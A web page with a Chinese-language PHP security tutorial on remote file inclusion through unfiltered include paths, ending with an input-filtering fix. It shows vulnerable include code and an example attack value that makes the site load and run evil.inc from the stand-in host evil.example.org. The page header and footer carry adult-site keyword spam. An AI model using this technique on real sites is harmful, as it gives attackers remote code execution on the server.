国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

PHP安全-代碼注入

瀏覽:104日期:2022-09-12 08:03:12
代碼注入

一個特別危險的情形是當你試圖使用被污染數據作為動態包含的前導部分時:

<?php

include '{$_GET[’path’]}/header.inc';

?>

在這種情形下攻擊者能操縱不只是文件名,還能控制所包含的資源。由于PHP默認不只可以包含文件,還可以包含下面的資源(由配置文件中的allow_url_fopen所控制):

<?php

include ’http://www.google.com/’;

?>

include語句在此時會把http://www.google.com的網頁源代碼作為本地文件一樣包含進來。雖然上面的例子是無害的,但是想像一下如果GOOGLE返回的源代碼包含PHP代碼時會如何。這樣其中包含的PHP代碼就會被解析并執行。這是攻擊者借以發布惡意代碼摧毀你的安全體系的良機。

想象一下path的值指向了下面的攻擊者所控制的資源:

http://example.org/index.php?pat ... e.org%2Fevil.inc%3F

在上例中,path的值是URL編碼過的,原值如下:

http://evil.example.org/evil.inc?

這就導致了include語句包含并執行了攻擊者所選定的腳本(evil.inc),同時原來的文件名/header.inc會被認為是一個請求串:

<?php

include 'http://evil.example.org/evil.inc?/header.inc';

?>

這樣攻擊者就避免了去猜測剩下的目錄和文件名(/header.onc)并在evil.example.org上建立相同的路徑和文件名的必要性。相反地,在受攻擊網站的具體文件名被屏蔽的情況下,他只要保證evil.inc中輸出合法的他想要執行的代碼就行了。

這種情況與允許攻擊者在你的網站上直接修改PHP代碼一樣危險。幸運的是,只要在include和require語句前對數據進行過濾即可防止這種情況的發生:

<?php

$clean = array();

/* $_GET[’path’] is filtered and stored in $clean[’path’]. */

include '{$clean[’path’]}/header.inc';

?>

標簽: PHP
相關文章:
主站蜘蛛池模板: 欧美日韩国产综合一区二区三区 | 亚洲一级香蕉视频 | 99国产精品热久久久久久夜夜嗨 | 在线成人免费观看国产精品 | 成年女人毛片免费视频永久vip | 国产精品综合一区二区 | 国产高清在线精品二区一 | 欧美成人在线免费观看 | 一级毛片免费在线观看网站 | 国产91会所洗浴女技师按摩 | 日本国产免费一区不卡在线 | 中文一级毛片 | 欧美一级毛片免费高清aa | 91精品在线国产 | 欧美精品国产制服第一页 | 中国一级毛片免费观看 | 特黄特黄一级高清免费大片 | 亚洲天堂在线观看视频 | 免费欧美一级片 | 国产精品一区二区久久精品涩爱 | 不卡无毒免费毛片视频观看 | 2021一本久道 | 久久精品国产99久久6动漫欧 | 久久亚洲国产精品一区二区 | 精品特级一级毛片免费观看 | 一区二区三区视频在线观看 | 三级黄页 | 极品丝袜高跟91白沙发在线 | 久久精品一区二区三区中文字幕 | 久久 精品 一区二区 | 性欧美videos高清精品 | 日韩区在线 | 一级毛片国产 | 精品欧美一区二区在线观看欧美熟 | 国产精品aⅴ | 亚洲男人a天堂在线2184 | 国产一级二级三级毛片 | 日韩欧国产精品一区综合无码 | 欧美成视频无需播放器 | 亚洲国产成人在线观看 | 亚洲一区二区免费 |